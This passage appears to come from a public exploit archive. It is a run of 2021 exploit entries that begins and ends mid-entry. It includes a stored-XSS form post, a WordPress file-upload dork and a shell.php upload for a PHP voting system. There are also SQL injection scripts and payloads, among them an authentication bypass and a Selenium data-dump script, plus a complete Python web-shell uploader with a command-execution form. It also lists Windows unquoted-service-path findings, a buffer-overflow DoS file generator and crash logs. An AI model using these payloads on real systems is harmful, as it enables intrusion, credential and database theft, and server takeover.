name="cid" 6 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="parent_id" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="guid" ee34f23a-7167-a454-8576-20bef7575c15 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="title" <script>alert(1)</script> -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="status" 1 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="virtual_filename" script-alert-1-script -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="summary" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="description" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="meta_description" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="meta_key" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="tags" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="date_available" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="date_expiry" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="items_per_page" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[]" display_pagetitle -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[]" __null__ -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[]" display_child_categories -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[]" __null__ -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[]" display_items -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[]" __null__ -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[child_categories_sortby]" date_created -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="options[items_sortby]" date_created -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="permission_read_everyone" everyone -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="permission_read[]" 1 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="permission_read[]" 2 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="permission_read[]" 3 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="permission_write[]" 1 -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="cmh_media_selection" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="cmh_media_upload"; filename="" Content-Type: application/octet-stream -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="cmh_media_path" -----------------------------280033592236615772622294478489 Content-Disposition: form-data; name="cmh_media_url" -----------------------------280033592236615772622294478489--

# Title: Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload # Author: h4shur # date: 2021-05-06 # Vendor Homepage: https://wordpress.org # Software Link: https://wordpress.org/plugins/wp-super-edit/ # Version : 2.5.4 and earlier # Tested on: Windows 10 & Google Chrome # Category : Web Application Bugs # Dork : # inurl:"wp-content/plugins/wp-super-edit/superedit/" # inurl:"wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/" ### Note: # 1. Technical Description: This plugin allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored. # 2. Technical Description: WordPress Plugin "wp-super-edit" allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. This vulnerability is caused by FCKeditor in this plugin. Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step. The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored. ### POC: * Exploit 1 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/browser.html * Exploit 2 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/connectors/test.html * Exploit 3 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/test.html * Exploit 4 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/frmupload.html

# Exploit Title: Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation # Date: 04.05.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.epicgames.com https://www.easy.ac Epic Games Easy Anti-Cheat 4.0 Local Privilege Escalation Vendor: Epic Games, Inc. Product web page: https://www.epicgames.com https://www.easy.ac Affected version: 4.0.0.0 Summary: Easy Anti-Cheat is the industry-leading anti–cheat service, countering hacking and cheating in multiplayer PC games through the use of hybrid anti–cheat mechanisms. Desc: The application suffers from an unquoted search path issue impacting the service 'EasyAntiCheat' for Windows deployed as part of Easy Anti-Cheat Service application. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. Tested on: Microsoft Windows 10 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5652 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5652.php 04.05.2021 -- C:\Users>sc qc EasyAntiCheat [SC] QueryServiceConfig SUCCESS SERVICE_NAME: EasyAntiCheat TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : EasyAntiCheat DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: b2evolution 7-2-2 - 'cf_name' SQL Injection # Author: @nu11secur1ty # Testing and Debugging: @nu11secur1ty # Date: 05.06.2021 # Vendor: https://b2evolution.net/ # Link: https://b2evolution.net/downloads/7-2-2 # CVE: CVE-2021-28242 # Proof: https://streamable.com/x51kso [+] Exploit Source: #!/usr/bin/python3 # Author: @nu11secur1ty # CVE-2021-28242 from selenium import webdriver import time # Vendor: https://typo3.org/ website_link=" http://192.168.1.3/b2evolution/index.php?disp=login&redirect_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&return_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&source=menu%20link" # enter your login username username="admin" # enter your login password password="FvsDq7fmHvWF" #enter the element for username input field element_for_username="x" #enter the element for password input field element_for_password="q" #enter the element for submit button element_for_submit="login_action[login]" browser = webdriver.Chrome() #uncomment this line,for chrome users #browser = webdriver.Safari() #for macOS users[for others use chrome vis chromedriver] #browser = webdriver.Firefox() #uncomment this line,for chrome users browser.get((website_link)) try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) signInButton = browser.find_element_by_name(element_for_submit) signInButton.click() # Exploit vulnerability MySQL obtain sensitive database information by injecting SQL commands into the "cf_name" parameter time.sleep(7) # Receaving sensitive info for evo_users browser.get(("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT+*+FROM+%60evo_users%60+ORDER+BY+%60evo_&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections")) time.sleep(7) # Receaving sensitive info for evo_blogs browser.get((" http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_blogs`%20ORDER%20BY%20`evo_blogs`.`blog_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections")) time.sleep(7) # Receaving sensitive info for evo_section browser.get(("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_section`%20ORDER%20BY%20`evo_section`.`sec_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections")) time.sleep(7) browser.close() print("At the time, of the exploit, you had to see information about the tables...\n") except Exception: #### This exception occurs if the element are not found in the webpage. print("Sorry, your exploit is not working for some reasons...")

# Exploit Title: Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path # Discovery by: Erick Galindo # Discovery Date: 2020-05-06 # Vendor Homepage: https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Plus-x64-v0.7.4.exe # Tested Version: 0.7.4 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Sandboxie Service" | findstr /i /v """ Sandboxie Service SbieSvc C:\Program Files\Sandboxie-Plus\SbieSvc.exe Auto # Service info sc qc "SbieSvc" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: SbieSvc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Sandboxie-Plus\SbieSvc.exe GRUPO_ORDEN_CARGA : UIGroup ETIQUETA : 0 NOMBRE_MOSTRAR : Sandboxie Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.

# Exploit Title: Voting System 1.0 - Authentication Bypass (SQLI) # Date: 06/05/2021 # Exploit Author: secure77 # Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB You can simply bypass the /admin/login.php with the following sql injection. All you need is a bcrypt hash that is equal with your random password, the username should NOT match with an existing ########################### Vulnerable code ############################ if(isset($_POST['login'])){ $username = $_POST['username']; $password = $_POST['password']; $sql = "SELECT * FROM admin WHERE username = '$username'"; $query = $conn->query($sql); if($query->num_rows < 1){ $_SESSION['error'] = 'Cannot find account with the username'; } else{ $row = $query->fetch_assoc(); echo "DB Password: " . $row['password']; echo "<br>"; echo "<br>"; echo "Input Password: " . $password; if(password_verify($password, $row['password'])){ echo "Equal"; $_SESSION['admin'] = $row['id']; } else{ echo "not Equal"; $_SESSION['error'] = 'Incorrect password'; } } } else{ $_SESSION['error'] = 'Input admin credentials first'; } ########################### Payload ############################ POST /admin/login.php HTTP/1.1 Host: 192.168.1.1 DNT: 1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=tliephrsj1d5ljhbvsbccnqmff Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 167 login=yea&password=admin&username=dsfgdf' UNION SELECT 1,2,"$2y$12$jRwyQyXnktvFrlryHNEhXOeKQYX7/5VK2ZdfB9f/GcJLuPahJWZ9K",4,5,6,7 from INFORMATION_SCHEMA.SCHEMATA;-- -

# Exploit Title: Sandboxie 5.49.7 - Denial of Service (PoC) # Date: 06/05/2021 # Author: Erick Galindo # Vendor Homepage: https://sandboxie-plus.com/ # Software https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Classic-x64-v5.49.7.exe # Version: 5.49.7 # Tested on: Windows 10 Pro x64 es # Proof of Concept: #1.- Copy printed "AAAAA..." string to clipboard! #2.- Sandboxie Control->Sandbox->Set Container Folder #3.- Paste the buffer in the input then press ok buffer = "\x41" * 5000 f = open ("Sandboxie10.txt", "w") f.write(buffer) f.close()

# Exploit Title: WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path # Discovery by: Erick Galindo # Discovery Date: 2020-05-06 # Vendor Homepage: https://www.gearboxcomputers.com/downloads/wifihotspot.exe # Tested Version: 1.0.0.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: c:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ MainService WifiHotSpotSvc C:\Program Files (x86)\WifiHotSpot\WifiHotSpotService.exe Auto # Service info sc qc wifihotspotsvc [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: wifihotspotsvc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\WifiHotSpot\WifiHotSpotService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : MainService DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.

# Exploit Title: Voting System 1.0 - Remote Code Execution (Unauthenticated) # Date: 07/05/2021 # Exploit Author: secure77 # Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB Unauthenticated file upload is possible via /admin/candidates_add.php that can use for RCE. Your upload will be stored at /images/ and is also accessible without authentication. ########################### Vulnerable code ############################ <?php include 'includes/session.php'; if(isset($_POST['add'])){ $firstname = $_POST['firstname']; $lastname = $_POST['lastname']; $position = $_POST['position']; $platform = $_POST['platform']; $filename = $_FILES['photo']['name']; if(!empty($filename)){ move_uploaded_file($_FILES['photo']['tmp_name'], '../images/'.$filename); } $sql = "INSERT INTO candidates (position_id, firstname, lastname, photo, platform) VALUES ('$position', '$firstname', '$lastname', '$filename', '$platform')"; if($conn->query($sql)){ $_SESSION['success'] = 'Candidate added successfully'; } else{ $_SESSION['error'] = $conn->error; } } else{ $_SESSION['error'] = 'Fill up add form first'; } header('location: candidates.php'); ?> ########################### Payload ############################ POST /admin/candidates_add.php HTTP/1.1 Host: 192.168.1.1 Content-Length: 275 Cache-Control: max-age=0 Origin: http://192.168.1.1 Upgrade-Insecure-Requests: 1 DNT: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrmynB2CmGO6vwFpO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.1/admin/candidates.php Accept-Encoding: gzip, deflate Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close ------WebKitFormBoundaryrmynB2CmGO6vwFpO Content-Disposition: form-data; name="photo"; filename="shell.php" Content-Type: application/octet-stream <?php echo exec("whoami"); ?> ------WebKitFormBoundaryrmynB2CmGO6vwFpO Content-Disposition: form-data; name="add"

# Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated) # Date: 04-05-2021 # Exploit Author: Reza Afsahi # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html # Software Download: https://www.sourcecodester.com/download-code?nid=14714&title=Human+Resource+Information+System+Using+PHP+with+Source+Code # Version: 0.1 # Tested on: PHP 7.4.11 , Linux x64_x86 ############################################################################################################ # Description: # The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. ############################################################################################################ # Proof of concept: #!/usr/bin/python3 import requests import sys from bs4 import BeautifulSoup def find_shell(domain): req_2 = requests.get(domain + "/Admin_Dashboard/Add_employee.php") soup = BeautifulSoup(req_2.content , "html.parser") imgs = soup.find_all("img") for i in imgs: src = i['src'] if ("shell.php" in src): print(" [!] Your shell is ready :) ==> " + domain + "/Admin_Dashboard/" + src + "\n") break else: continue def upload_file(domain): print("\n [!] Uploading Shell . . .") payload = """ <!DOCTYPE html> <html> <head> <title> Shell </title> </head> <body> <form action="#" method="post"> <input type="text" name="cmd" style="width: 300px; height: 30px;" placeholder="Your Command ..."> <br><br> <input type="submit" name="submit" value="execute"> </form> <?php $cmd = $_POST['cmd']; $result = shell_exec($cmd); echo "<pre>{$result}</pre>"; ?> </body> </html> """ h = { "Content-Type" : "multipart/form-data" } f = {'employee_image':('shell.php',payload, 'application/x-php', {'Content-Disposition': 'form-data'} ) } d = { "emplo" : "", "employee_companyid" : "test", "employee_firstname" : "test", "employee_lastname" : "test", "employee_middlename" : "test", "branches_datefrom" : "0011-11-11", "branches_recentdate" : "2222-11-11", "employee_position" : "test", "employee_contact" : "23123132132", "employee_sss" : "test", "employee_tin" : "test", "employee_hdmf_pagibig" : "test", "employee_gsis" : "test" } url = domain + "/Admin_Dashboard/process/addemployee_process.php" req = requests.post(url , data=d , files = f) if req.status_code == 200: if ("Insert Successfully" in req.text): print("\n [!] Shell uploaded succefully\n") find_shell(domain) else: print("Exploit Failed 1") def main(): if len(sys.argv) != 2: print('[!] usage: %s <target url> ' % sys.argv[0]) print('[!] eg: %s http://vulndomain.com' % sys.argv[0]) sys.exit(-1) print("<><><><><><><><><><><><><><><><><><><><><><><><>") print("<> Human Resource Information System <>") print("<> Shell Uploader <>") print("<><><><><><><><><><><><><><><><><><><><><><><><>") target_domain = sys.argv[1] upload_file(target_domain) if __name__ == "__main__": main()

# Exploit Title: Epic Games Rocket League 1.95 - Stack Buffer Overrun # Date: 25.04.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.epicgames.com https://www.rocketleague.com Epic Games Rocket League 1.95 (AK::MemoryMgr::GetPoolName) Stack Buffer Overrun Vendor: Epic Games Inc. | Psyonix, LLC Product web page: https://www.epicgames.com https://www.psyonix.com https://www.rocketleague.com Affected version: <=1.95 Summary: Rocket League is a high-powered hybrid of arcade-style soccer and vehicular mayhem with easy-to-understand controls and fluid, physics-driven competition. Desc: The game suffers from a stack-based buffer overflow vulnerability. The issue is caused due to a boundary error in the processing of a UPK format file, which can be exploited to cause a stack buffer overflow when a user crafts the file with a large array of bytes inserted in the vicinity offset after the magic header. Successful exploitation could allow execution of arbitrary code on the affected machine. Tested on: Microsoft Windows 10 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5651 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5651.php 25.04.2021 -- Craft location: ..\rocketleague\TAGame\CookedPCConsole Header: C1 83 2A 9E 64 03 1F 00 hat_Headphones_SF.upk: ---------------------- ... ... ModLoad: 00007ff9`99ff0000 00007ff9`9a016000 C:\WINDOWS\system32\ncryptsslp.dll ModLoad: 00007ff9`32d70000 00007ff9`36a00000 C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_e9f7884f9b4f82b9\igd9dxva64.dll ModLoad: 00007ff9`315b0000 00007ff9`32d68000 C:\WINDOWS\System32\DriverStore\FileRepository\nvlti.inf_amd64_d79c53dfaa1cbce3\nvd3dumx.dll ModLoad: 00000000`00400000 00000000`0041e000 E:\Epic Games\rocketleague\Binaries\Win64\XINPUT1_3.dll ModLoad: 00007ff9`8dac0000 00007ff9`8db6c000 C:\WINDOWS\SYSTEM32\TextShaping.dll [0110.33] Log: Timed out while waiting for GPU to catch up. (500 ms) (62c.1074): Unknown exception - code 00000001 (!!! second chance !!!) KERNELBASE!RaiseException+0x69: 00007ff9`a0364b59 0f1f440000 nop dword ptr [rax+rax] 0:024> r rax=00007ff99feeb925 rbx=0000000000000000 rcx=0000000000000000 rdx=000000214edfe8b0 rsi=000000214edfef50 rdi=000000214edfe700 rip=00007ff9a0364b59 rsp=000000214edfef30 rbp=0000000000000000 r8=000000214edfedb0 r9=0000000000000000 r10=00000000000000c0 r11=000000214edfee2e r12=0000000000000000 r13=00007ff776205bb0 r14=00007ff776dab710 r15=000000214edff8a0 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000204 KERNELBASE!RaiseException+0x69: 00007ff9`a0364b59 0f1f440000 nop dword ptr [rax+rax] 0:024> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* *** ERROR: Symbol file could not be found. Defaulted to export symbols for E:\Epic Games\rocketleague\Binaries\Win64\EOSSDK-Win64-Shipping.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\System32\DriverStore\FileRepository\nvlti.inf_amd64_d79c53dfaa1cbce3\nvwgf2umx.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Epic Games\Launcher\Portal\Extras\Overlay\EOSOVH-Win64-Shipping.dll - GetUrlPageData2 (WinHttp) failed: 12002. DUMP_CLASS: 2 DUMP_QUALIFIER: 0 FAULTING_IP: KERNELBASE!RaiseException+69 00007ffe`d4d64b59 0f1f440000 nop dword ptr [rax+rax] EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 00007ffed4d64b59 (KERNELBASE!RaiseException+0x0000000000000069) ExceptionCode: 00000001 ExceptionFlags: 00000000 NumberParameters: 0 FAULTING_THREAD: 00000490 DEFAULT_BUCKET_ID: APPLICATION_FAULT PROCESS_NAME: RocketLeague.exe ERROR_CODE: (NTSTATUS) 0x1 - STATUS_WAIT_1 EXCEPTION_CODE: (Win32) 0x1 (1) - Incorrect function. EXCEPTION_CODE_STR: 1 WATSON_BKT_PROCSTAMP: 606f6afa WATSON_BKT_PROCVER: 1.0.10897.0 PROCESS_VER_PRODUCT: Rocket League WATSON_BKT_MODULE: KERNELBASE.dll WATSON_BKT_MODSTAMP: 2f2f77bf WATSON_BKT_MODOFFSET: 34b59 WATSON_BKT_MODVER: 10.0.19041.906 MODULE_VER_PRODUCT: Microsoft® Windows® Operating System BUILD_VERSION_STRING: 10.0.19041.928 (WinBuild.160101.0800) MODLIST_WITH_TSCHKSUM_HASH: ac197712fdc57f2bb67f9b17107e5701c93b4362 MODLIST_SHA1_HASH: 342698e051c108fd7be71346f5d34f8a14c38381 NTGLOBALFLAG: 0 PROCESS_BAM_CURRENT_THROTTLED: 0 PROCESS_BAM_PREVIOUS_THROTTLED: 0 APPLICATION_VERIFIER_FLAGS: 0 PRODUCT_TYPE: 1 SUITE_MASK: 784 DUMP_TYPE: fe ANALYSIS_SESSION_HOST: LAB17 ANALYSIS_SESSION_TIME: 04-25-2021 13:23:34.0003 ANALYSIS_VERSION: 10.0.16299.91 amd64fre THREAD_ATTRIBUTES: OS_LOCALE: ENU PROBLEM_CLASSES: ID: [0n308] Type: [APPLICATION_FAULT] Class: Primary Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) BUCKET_ID Name: Add Data: Omit PID: [Unspecified] TID: [Unspecified] Frame: [0] BUGCHECK_STR: APPLICATION_FAULT PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT LAST_CONTROL_TRANSFER: from 00007ff78f1cbf65 to 00007ffed4d64b59 STACK_TEXT: 00000089`23dfe910 00007ff7`8f1cbf65 : 00007ff7`9123b710 00000000`000002f8 00007ff7`906e5190 00000089`23dfea20 : KERNELBASE!RaiseException+0x69 00000089`23dfe9f0 00007ff7`8f190215 : 00000089`23dff710 00000089`23dff5d0 00000089`23dff710 00007ffe`d72ee25f : RocketLeague!GetOutermost+0x29245 00000089`23dff250 00007ff7`8f123466 : 00000089`23dff710 00007ff7`906eb668 00000199`6cf33e40 00000089`23dfe828 : RocketLeague!AK::MusicEngine::Term+0xfce95 00000089`23dff4d0 00007ff7`8f1297f9 : 0000019a`00000001 00000000`00000000 00000089`23dff770 00000199`00000001 : RocketLeague!AK::MusicEngine::Term+0x900e6 00000089`23dff6d0 00007ff7`8f1d1e40 : 00000000`00000001 00000000`00000001 0000019a`00000000 00000199`6d26ffd0 : RocketLeague!AK::MusicEngine::Term+0x96479 00000089`23dff850 00007ffe`d6297034 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : RocketLeague!Scaleform::System::Init+0x11c0 00000089`23dff880 00007ffe`d7302651 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14 00000089`23dff8b0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21 THREAD_SHA1_HASH_MOD_FUNC: b03d2da27c20caaf2a76cdae45ff251160c76115 THREAD_SHA1_HASH_MOD_FUNC_OFFSET: ff5c11b082c48239ef2666814fc4e06663a8c892 THREAD_SHA1_HASH_MOD: 96a23e97d7538141fe1b904de60919531df8b505 FOLLOWUP_IP: RocketLeague!GetOutermost+29245 00007ff7`8f1cbf65 eb13 jmp RocketLeague!GetOutermost+0x2925a (00007ff7`8f1cbf7a) FAULT_INSTR_CODE: 8b4813eb SYMBOL_STACK_INDEX: 1 SYMBOL_NAME: rocketleague!GetOutermost+29245 FOLLOWUP_NAME: MachineOwner MODULE_NAME: RocketLeague IMAGE_NAME: RocketLeague.exe DEBUG_FLR_IMAGE_TIMESTAMP: 606f6afa STACK_COMMAND: ~24s ; .cxr ; kb FAILURE_BUCKET_ID: APPLICATION_FAULT_1_RocketLeague.exe!GetOutermost BUCKET_ID: APPLICATION_FAULT_rocketleague!GetOutermost+29245 FAILURE_EXCEPTION_CODE: 1 FAILURE_IMAGE_NAME: RocketLeague.exe BUCKET_ID_IMAGE_STR: RocketLeague.exe FAILURE_MODULE_NAME: RocketLeague BUCKET_ID_MODULE_STR: RocketLeague FAILURE_FUNCTION_NAME: GetOutermost BUCKET_ID_FUNCTION_STR: GetOutermost BUCKET_ID_OFFSET: 29245 BUCKET_ID_MODTIMEDATESTAMP: 606f6afa BUCKET_ID_MODCHECKSUM: 251425f BUCKET_ID_MODVER_STR: 1.0.10897.0 BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_ FAILURE_PROBLEM_CLASS: APPLICATION_FAULT FAILURE_SYMBOL_NAME: RocketLeague.exe!GetOutermost WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/RocketLeague.exe/1.0.10897.0/606f6afa/KERNELBASE.dll/10.0.19041.906/2f2f77bf/1/00034b59.htm?Retriage=1 TARGET_TIME: 2021-04-25T11:23:44.000Z OSBUILD: 19042 OSSERVICEPACK: 928 SERVICEPACK_NUMBER: 0 OS_REVISION: 0 OSPLATFORM_TYPE: x64 OSNAME: Windows 10 OSEDITION: Windows 10 WinNt SingleUserTS Personal USER_LCID: 0 OSBUILD_TIMESTAMP: 2022-01-18 11:29:28 BUILDDATESTAMP_STR: 160101.0800 BUILDLAB_STR: WinBuild BUILDOSVER_STR: 10.0.19041.928 ANALYSIS_SESSION_ELAPSED_TIME: 795d ANALYSIS_SOURCE: UM FAILURE_ID_HASH_STRING: um:application_fault_1_rocketleague.exe!getoutermost FAILURE_ID_HASH: {ee1c73f7-ce6b-9e4a-8e1b-66937ecee43c} Followup: MachineOwner ... ... (aa0.3818): Unknown exception - code 00000001 (first chance) (aa0.3818): Unknown exception - code 00000001 (!!! second chance !!!) KERNELBASE!RaiseException+0x69: 00007ffe`d4d64b59 0f1f440000 nop dword ptr [rax+rax] 0:024> g [0188.65] Warning: Warning, Detected data corruption [header] trying to read 2549 bytes at offset 135132 from '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'. Please delete file and recook. [0188.65] Critical: appError called: I/O failure operating on '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk' [0188.65] Critical: Windows GetLastError: The operation completed successfully. (0) [0188.65] Warning: Warning, Detected data corruption [undershoot] trying to read 2549 bytes at offset 135132 from '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'. Please delete file and recook. [0188.65] Critical: Error reentered: I/O failure operating on '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk' [0188.65] Warning: Warning, Detected data corruption [incorrect uncompressed size] calculated 1094795585 bytes, requested 2549 bytes at offset 135132 from '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'. Please delete file and recook. [0188.65] Critical: Error reentered: I/O failure operating on '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk' [0188.66] DevBeacon: FWebSocket::ReadCloseReason this=000002B686633200 received opcode CLOSE. Code=1000 Reason=IdleTimeout [0188.66] DevOnline: EOSSDK-LogEOS: Large tick time detected 22.5409 hat_peanut_SF.upk: ------------------ ... ... 0:077> g (3568.230c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. VCRUNTIME140!memcmp+0xee: 00007ffe`afc812de f3a4 rep movs byte ptr [rdi],byte ptr [rsi] 0:000> r rax=0000009852afeaf8 rbx=000001a1cc362268 rcx=ffffffff9c71eae4 rdx=0000010951ea4107 rsi=000001a1a49a4107 rdi=0000009852b00000 rip=00007ffeafc812de rsp=0000009852afe9c8 rbp=ffffffff9c71ffec r8=ffffffff9c71ffec r9=00000000000000ff r10=000001a1a49a2bff r11=0000009852afeaf8 r12=0000000000000000 r13=0000000000000000 r14=0000009852afeaf8 r15=0000000000000000 iopl=0 